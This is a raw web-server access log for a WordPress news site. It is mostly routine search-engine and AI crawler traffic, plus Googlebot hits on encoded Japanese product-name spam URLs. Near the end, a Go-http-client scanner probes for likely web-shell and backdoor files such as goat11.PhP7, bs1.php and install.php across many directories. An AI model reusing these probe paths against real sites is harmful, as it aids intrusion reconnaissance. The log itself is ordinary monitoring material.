57.141.0.61 - - [19/Oct/2025:11:29:07 -0400] "GET /know-about-worlds-most-dangerous-snakes/ HTTP/1.1" 200 287016 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
54.37.118.79 - - [19/Oct/2025:11:29:21 -0400] "GET /tag/santa-jokes-news/ HTTP/1.1" 200 121431 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.79.170 - - [19/Oct/2025:11:29:32 -0400] "GET /first-karva-chauth-in-bollywood-actress/harshdeep-kaurmankeet-singh/ HTTP/1.1" 200 122054 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.79.170 - - [19/Oct/2025:11:30:02 -0400] "GET /?a=927104536608&channel=dd39f2&from=news.php%3Fid%3D45366-637%26name%3D%E3%80%90%E5%8F%96%E4%BB%98%E5%AF%BE%E8%B1%A1%E3%80%9120%E3%82%A2%E3%83%AB%E3%83%95%E3%82%A1%E3%83%BC%E3%83%89+245%2F40R19+98Y+XL+%3Cbr%3E%E3%83%9F%E3%82%B7%E3%83%A5%E3%83%A9%E3%83%B3+%E3%83%91%E3%82%A4%E3%83%AD%E3%83%83%E3%83%88%E3%82%B9%E3%83%9D%E3%83%BC%E3%83%845+%3Cbr%3EWeds+%E3%82%A6%E3%82%A7%E3%83%83%E3%82%BA+%E3%83%AC%E3%82%AA%E3%83%8B%E3%82%B9+JG+BK%2FSC+%3Cbr%3E19%E3%82%A4%E3%83%B3%E3%83%81+8.0J+5H114.3+%3Cbr%3E%E3%82%B5%E3%83%9E%E3%83%BC%E3%82%BF%E3%82%A4%E3%83%A4%E3%83%9B%E3%82%A4%E3%83%BC%E3%83%AB%E3%82%BB%E3%83%83%E3%83%88+%3Cbr%3E HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.168 - - [19/Oct/2025:11:30:02 -0400] "GET /?a=927104536608&channel=dd39f2&from=news.php%3Fid%3D45366-637%26name%3D%E3%80%90%E5%8F%96%E4%BB%98%E5%AF%BE%E8%B1%A1%E3%80%9120%E3%82%A2%E3%83%AB%E3%83%95%E3%82%A1%E3%83%BC%E3%83%89%20245%2F40R19%2098Y%20XL%20%3Cbr%3E%E3%83%9F%E3%82%B7%E3%83%A5%E3%83%A9%E3%83%B3%20%E3%83%91%E3%82%A4%E3%83%AD%E3%83%83%E3%83%88%E3%82%B9%E3%83%9D%E3%83%BC%E3%83%845%20%3Cbr%3EWeds%20%E3%82%A6%E3%82%A7%E3%83%83%E3%82%BA%20%E3%83%AC%E3%82%AA%E3%83%8B%E3%82%B9%20JG%20BK%2FSC%20%3Cbr%3E19%E3%82%A4%E3%83%B3%E3%83%81%208.0J%205H114.3%20%3Cbr%3E%E3%82%B5%E3%83%9E%E3%83%BC%E3%82%BF%E3%82%A4%E3%83%A4%E3%83%9B%E3%82%A4%E3%83%BC%E3%83%AB%E3%82%BB%E3%83%83%E3%83%88%20%3Cbr%3E HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:11:30:13 -0400] "GET /ghosts-and-aliens-seen-at-this-mysterious-place-of-india/003_1464356041/feed HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:30:13 -0400] "GET /this-tree-stands-firmly-even-after-it-was-cut-in-pieces HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:30:13 -0400] "GET /ghosts-and-aliens-seen-at-this-mysterious-place-of-india/003_1464356041/feed/ HTTP/1.1" 200 870 "http://wahgazab.com/ghosts-and-aliens-seen-at-this-mysterious-place-of-india/003_1464356041/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:30:13 -0400] "GET /this-tree-stands-firmly-even-after-it-was-cut-in-pieces/ HTTP/1.1" 200 281222 "http://wahgazab.com/this-tree-stands-firmly-even-after-it-was-cut-in-pieces" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.249.79.168 - - [19/Oct/2025:11:30:19 -0400] "GET /?a=6675719868200&channel=ba125a&from=shared.php%3Fid%3D198682-5628%26name%3D%5BReebok%5D+%E3%83%95%E3%83%BC%E3%83%89%E4%BB%98%E3%81%8D%E3%83%88%E3%83%AC%E3%83%BC%E3%83%8A%E3%83%BC+%E3%83%91%E3%83%BC%E3%82%AB%E3%83%BC+%E3%82%B9%E3%82%A6%E3%82%A7%E3%83%83%E3%83%88+%E8%A3%8F%E6%AF%9B+%E9%95%B7%E8%A2%96+%E3%83%95%E3%83%BC%E3%83%89%E4%BB%98%E3%81%8D+%E3%82%B7%E3%83%B3%E3%83%97%E3%83%AB+%E3%83%97%E3%83%AB%E3%83%91%E3%83%BC%E3%82%AB%E3%83%BC+%E4%BF%9D%E6%B8%A9+%E3%82%AA%E3%83%BC%E3%83%90%E3%83%BC%E3%82%B5%E3%82%A4%E3%82%BA HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.168 - - [19/Oct/2025:11:30:19 -0400] "GET /?a=6675719868200&channel=ba125a&from=shared.php%3Fid%3D198682-5628%26name%3D%5BReebok%5D%20%E3%83%95%E3%83%BC%E3%83%89%E4%BB%98%E3%81%8D%E3%83%88%E3%83%AC%E3%83%BC%E3%83%8A%E3%83%BC%20%E3%83%91%E3%83%BC%E3%82%AB%E3%83%BC%20%E3%82%B9%E3%82%A6%E3%82%A7%E3%83%83%E3%83%88%20%E8%A3%8F%E6%AF%9B%20%E9%95%B7%E8%A2%96%20%E3%83%95%E3%83%BC%E3%83%89%E4%BB%98%E3%81%8D%20%E3%82%B7%E3%83%B3%E3%83%97%E3%83%AB%20%E3%83%97%E3%83%AB%E3%83%91%E3%83%BC%E3%82%AB%E3%83%BC%20%E4%BF%9D%E6%B8%A9%20%E3%82%AA%E3%83%BC%E3%83%90%E3%83%BC%E3%82%B5%E3%82%A4%E3%82%BA HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:11:31:05 -0400] "GET /make-this-mothers-day-special-for-your-moms/01-8/feed HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:31:05 -0400] "GET /make-this-mothers-day-special-for-your-moms/01-8/feed/ HTTP/1.1" 200 812 "http://wahgazab.com/make-this-mothers-day-special-for-your-moms/01-8/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:31:06 -0400] "GET /ghosts-and-aliens-seen-at-this-mysterious-place-of-india/this-mysterious-place-of-india5 HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:31:06 -0400] "GET /ghosts-and-aliens-seen-at-this-mysterious-place-of-india/this-mysterious-place-of-india5/ HTTP/1.1" 200 122630 "http://wahgazab.com/ghosts-and-aliens-seen-at-this-mysterious-place-of-india/this-mysterious-place-of-india5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
92.222.104.214 - - [19/Oct/2025:11:31:55 -0400] "GET /tag/station-master/ HTTP/1.1" 200 121415 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
57.141.0.65 - - [19/Oct/2025:11:32:11 -0400] "GET /wp-sitemap-taxonomies-post_format-1.xml HTTP/1.1" 200 348 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
17.241.227.231 - - [19/Oct/2025:11:32:19 -0400] "GET /wp-content/uploads/2017/09/baby-girl-went-through-the-brain-surgery-while-playing-candy-crush-game-1.jpg HTTP/1.1" 200 79078 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.218 - - [19/Oct/2025:11:32:31 -0400] "GET /wp-content/uploads/2016/01/Salman-Khan-150x150.jpg HTTP/1.1" 404 136514 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.172 - - [19/Oct/2025:11:32:33 -0400] "GET /wp-content/uploads/2015/11/abhishek-birla-%E2%80%[email protected] HTTP/1.1" 200 10263 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
57.141.0.31 - - [19/Oct/2025:11:33:00 -0400] "GET /now-it-is-possible-to-open-gmail-account-without-password/ HTTP/1.1" 200 279126 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
158.46.143.19 - - [19/Oct/2025:11:33:13 -0400] "GET /wp-content/uploads/2017/10/hundreds-year-old-clock-to-reveal-the-mystery-behind-the-sinking-of-titanic-ship-1.jpg HTTP/1.1" 200 76556 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
216.73.216.135 - - [19/Oct/2025:11:33:13 -0400] "GET /this-male-goat-costs-5-lakhs-eats-almonds-and-cashew-and-drinks-milk/sultan-bakra/feed HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:33:14 -0400] "GET /this-male-goat-costs-5-lakhs-eats-almonds-and-cashew-and-drinks-milk/sultan-bakra/feed/ HTTP/1.1" 200 888 "http://wahgazab.com/this-male-goat-costs-5-lakhs-eats-almonds-and-cashew-and-drinks-milk/sultan-bakra/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:33:14 -0400] "GET /excruciating-pain-that-makes-your-eyes-wet HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:33:14 -0400] "GET /excruciating-pain-that-makes-your-eyes-wet/ HTTP/1.1" 200 287223 "http://wahgazab.com/excruciating-pain-that-makes-your-eyes-wet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
180.76.30.39 - - [19/Oct/2025:11:33:23 -0400] "GET /wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=492e3cf54bd42df3b24a3de8e2307cafx HTTP/1.1" 200 38952 "http://wahgazab.com/farhan-akhtar-refuses-to-work-with-shahrukh/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.76.30.38 - - [19/Oct/2025:11:33:23 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=492e3cf54bd42df3b24a3de8e2307cafx HTTP/1.1" 200 173151 "http://wahgazab.com/farhan-akhtar-refuses-to-work-with-shahrukh/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.76.30.39 - - [19/Oct/2025:11:33:24 -0400] "GET /wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 48249 "http://wahgazab.com/farhan-akhtar-refuses-to-work-with-shahrukh/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.76.30.21 - - [19/Oct/2025:11:33:23 -0400] "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.8.3 HTTP/1.1" 200 116345 "http://wahgazab.com/farhan-akhtar-refuses-to-work-with-shahrukh/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.76.30.39 - - [19/Oct/2025:11:33:26 -0400] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 87553 "http://wahgazab.com/farhan-akhtar-refuses-to-work-with-shahrukh/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.76.30.21 - - [19/Oct/2025:11:33:28 -0400] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 13577 "http://wahgazab.com/farhan-akhtar-refuses-to-work-with-shahrukh/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.76.30.53 - - [19/Oct/2025:11:33:22 -0400] "GET /farhan-akhtar-refuses-to-work-with-shahrukh/ HTTP/1.1" 200 278496 "http://m.baidu.com/s?wd=subjectp3u" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
17.246.15.96 - - [19/Oct/2025:11:33:46 -0400] "GET /wp-content/uploads/2017/10/a-planet-in-this-solar-system-to-remain-human-less2.jpg HTTP/1.1" 200 77675 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.79.170 - - [19/Oct/2025:11:34:01 -0400] "GET /?a=9155582918504&channel=4f0031&from=product.php%3Fid%3D829185-12821%26name%3D%E3%83%AB%E3%83%BC%E3%83%95%E3%83%A9%E3%83%83%E3%82%AF+%E3%82%B9%E3%83%90%E3%83%AB+%E3%83%95%E3%82%A9%E3%83%AC%E3%82%B9%E3%83%88+2014-2021+%E5%AF%BE%E5%BF%9C+%E3%82%A2%E3%83%AB%E3%83%9F%E8%A3%BD%E3%83%A9%E3%82%B2%E3%83%83%E3%82%B8%E3%83%A9%E3%83%83%E3%82%AF+%E3%82%B5%E3%82%A4%E3%83%89%E3%83%AC%E3%83%BC%E3%83%AB%E4%BB%98%E3%81%8D+%E3%83%AB%E3%83%BC%E3%83%95%E3%83%88%E3%83%83%E3%83%97%E3%82%AB%E3%83%BC%E3%82%B4%E3%83%90%E3%83%83%E3%82%B0%E3%82%AD%E3%83%A3%E3%83%AA HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.169 - - [19/Oct/2025:11:34:02 -0400] "GET /?a=9155582918504&channel=4f0031&from=product.php%3Fid%3D829185-12821%26name%3D%E3%83%AB%E3%83%BC%E3%83%95%E3%83%A9%E3%83%83%E3%82%AF%20%E3%82%B9%E3%83%90%E3%83%AB%20%E3%83%95%E3%82%A9%E3%83%AC%E3%82%B9%E3%83%88%202014-2021%20%E5%AF%BE%E5%BF%9C%20%E3%82%A2%E3%83%AB%E3%83%9F%E8%A3%BD%E3%83%A9%E3%82%B2%E3%83%83%E3%82%B8%E3%83%A9%E3%83%83%E3%82%AF%20%E3%82%B5%E3%82%A4%E3%83%89%E3%83%AC%E3%83%BC%E3%83%AB%E4%BB%98%E3%81%8D%20%E3%83%AB%E3%83%BC%E3%83%95%E3%83%88%E3%83%83%E3%83%97%E3%82%AB%E3%83%BC%E3%82%B4%E3%83%90%E3%83%83%E3%82%B0%E3%82%AD%E3%83%A3%E3%83%AA HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:11:34:19 -0400] "GET /this-male-goat-costs-5-lakhs-eats-almonds-and-cashew-and-drinks-milk/sultan-bakra1 HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:34:20 -0400] "GET /this-male-goat-costs-5-lakhs-eats-almonds-and-cashew-and-drinks-milk/sultan-bakra1/ HTTP/1.1" 200 121807 "http://wahgazab.com/this-male-goat-costs-5-lakhs-eats-almonds-and-cashew-and-drinks-milk/sultan-bakra1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
17.241.219.112 - - [19/Oct/2025:11:34:53 -0400] "GET /wp-content/uploads/2017/10/unknown-mysteries-related-to-tirupati-balaji-temple-revealed-150x150.jpg HTTP/1.1" 200 8983 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
37.59.204.144 - - [19/Oct/2025:11:34:58 -0400] "GET /tag/international-space-station-seen-in-the-sky/ HTTP/1.1" 200 121892 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
57.141.0.54 - - [19/Oct/2025:11:35:07 -0400] "GET /this-mermaid-caught-in-the-camera-under-water/ HTTP/1.1" 200 282290 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.79.169 - - [19/Oct/2025:11:35:23 -0400] "GET /tag/naimisharanya/feed/ HTTP/1.1" 200 7906 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:11:35:59 -0400] "GET /access-whatsapp-without-internet-connection HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:35:59 -0400] "GET /access-whatsapp-without-internet-connection/ HTTP/1.1" 200 283671 "http://wahgazab.com/access-whatsapp-without-internet-connection" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
136.144.19.212 - - [19/Oct/2025:11:36:17 -0400] "GET / HTTP/1.1" 200 201202 "-" "Go-http-client/1.1"
136.144.19.212 - - [19/Oct/2025:11:36:19 -0400] "GET //wp-content/uploads/ HTTP/1.1" 200 2715 "-" "Go-http-client/1.1"
136.144.19.212 - - [19/Oct/2025:11:36:19 -0400] "GET //wp-content/plugins/ HTTP/1.1" 200 - "-" "Go-http-client/1.1"
136.144.19.212 - - [19/Oct/2025:11:36:19 -0400] "GET //wp-admin/admin-ajax.php HTTP/1.1" 400 1 "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:20 -0400] "GET //wp-content/themes/twenty/twenty.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:21 -0400] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/themes/twenty/twenty.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:22 -0400] "GET //wp-content/item.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:23 -0400] "GET /wp-content/item.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/item.php" "Go-http-client/1.1"
66.249.79.169 - - [19/Oct/2025:11:36:24 -0400] "GET /?a=3874816118401&channel=53cceb&from=goods.php%3Fid%3D161184-4661%26name%3D%E3%82%AD%E3%83%A3%E3%83%AD%E3%82%A6%E3%82%A7%E3%82%A4+%E3%83%AC%E3%82%AC%E3%82%B7%E3%83%BC+%E3%83%A6%E3%83%BC%E3%83%86%E3%82%A3%E3%83%AA%E3%83%86%E3%82%A3+LEGACY%282012%29+U3+%E3%83%95%E3%83%AC%E3%83%83%E3%82%AF%E3%82%B9S+%E4%B8%AD%E5%8F%A4+D%E3%83%A9%E3%83%B3%E3%82%AF HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.24.219.165 - - [19/Oct/2025:11:36:24 -0400] "GET //goat11.PhP7 HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:25 -0400] "GET /goat11.PhP7 HTTP/1.1" 404 136514 "http://wahgazab.com//goat11.PhP7" "Go-http-client/1.1"
66.249.79.170 - - [19/Oct/2025:11:36:24 -0400] "GET /?a=3874816118401&channel=53cceb&from=goods.php%3Fid%3D161184-4661%26name%3D%E3%82%AD%E3%83%A3%E3%83%AD%E3%82%A6%E3%82%A7%E3%82%A4%20%E3%83%AC%E3%82%AC%E3%82%B7%E3%83%BC%20%E3%83%A6%E3%83%BC%E3%83%86%E3%82%A3%E3%83%AA%E3%83%86%E3%82%A3%20LEGACY%282012%29%20U3%20%E3%83%95%E3%83%AC%E3%83%83%E3%82%AF%E3%82%B9S%20%E4%B8%AD%E5%8F%A4%20D%E3%83%A9%E3%83%B3%E3%82%AF HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.24.219.165 - - [19/Oct/2025:11:36:25 -0400] "GET //dropdown.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:26 -0400] "GET /dropdown.php HTTP/1.1" 404 136514 "http://wahgazab.com//dropdown.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:27 -0400] "GET //wp-includes/Text/about.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:28 -0400] "GET /wp-includes/Text/about.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-includes/Text/about.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:29 -0400] "GET //wp-includes/rest-api/about.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:29 -0400] "GET /wp-includes/rest-api/about.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-includes/rest-api/about.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:31 -0400] "GET //content.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:31 -0400] "GET /content.php HTTP/1.1" 404 136514 "http://wahgazab.com//content.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:32 -0400] "GET //wp-admin/install.php HTTP/1.1" 200 1261 "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:33 -0400] "GET //bs1.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:33 -0400] "GET /bs1.php HTTP/1.1" 404 136514 "http://wahgazab.com//bs1.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:35 -0400] "GET //wp-content/install.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:35 -0400] "GET /wp-content/install.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/install.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:36 -0400] "GET //install.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:37 -0400] "GET /install.php HTTP/1.1" 404 136514 "http://wahgazab.com//install.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:38 -0400] "GET //wp-includes/install.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:39 -0400] "GET /wp-includes/install.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-includes/install.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:40 -0400] "GET //wp-admin/images/install.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:40 -0400] "GET /wp-admin/images/install.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/images/install.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:42 -0400] "GET //cgi-bin/install.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
66.249.79.169 - - [19/Oct/2025:11:36:42 -0400] "GET /?a=9980272233400&channel=ad81bb&from=jp.php%3Fid%3D722334-9853%26name%3D%EF%BC%88%E3%81%BE%E3%81%A8%E3%82%81%EF%BC%89+%E3%83%88%E3%83%B3%E3%83%9C%E9%89%9B%E7%AD%86+%E4%BF%AE%E6%AD%A3%E3%83%86%E3%83%BC%E3%83%97%E3%83%A2%E3%83%8EYX+%E6%9C%AC%E4%BD%93+CT-YX4+1%E5%80%8B%E5%85%A5+%E3%80%94%C3%9710%E3%82%BB%E3%83%83%E3%83%88%E3%80%95 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.24.219.165 - - [19/Oct/2025:11:36:42 -0400] "GET /cgi-bin/install.php HTTP/1.1" 404 136514 "http://wahgazab.com//cgi-bin/install.php" "Go-http-client/1.1"
66.249.79.169 - - [19/Oct/2025:11:36:42 -0400] "GET /?a=9980272233400&channel=ad81bb&from=jp.php%3Fid%3D722334-9853%26name%3D%EF%BC%88%E3%81%BE%E3%81%A8%E3%82%81%EF%BC%89%20%E3%83%88%E3%83%B3%E3%83%9C%E9%89%9B%E7%AD%86%20%E4%BF%AE%E6%AD%A3%E3%83%86%E3%83%BC%E3%83%97%E3%83%A2%E3%83%8EYX%20%E6%9C%AC%E4%BD%93%20CT-YX4%201%E5%80%8B%E5%85%A5%20%E3%80%94%C3%9710%E3%82%BB%E3%83%83%E3%83%88%E3%80%95 HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.24.219.165 - - [19/Oct/2025:11:36:43 -0400] "GET //.well-known/acme-challenge/install.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:44 -0400] "GET /.well-known/acme-challenge/install.php HTTP/1.1" 404 136514 "http://wahgazab.com//.well-known/acme-challenge/install.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:45 -0400] "GET //item.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:46 -0400] "GET /item.php HTTP/1.1" 404 136514 "http://wahgazab.com//item.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:47 -0400] "GET //wp-content/tmpls.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:47 -0400] "GET /wp-content/tmpls.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/tmpls.php" "Go-http-client/1.1"
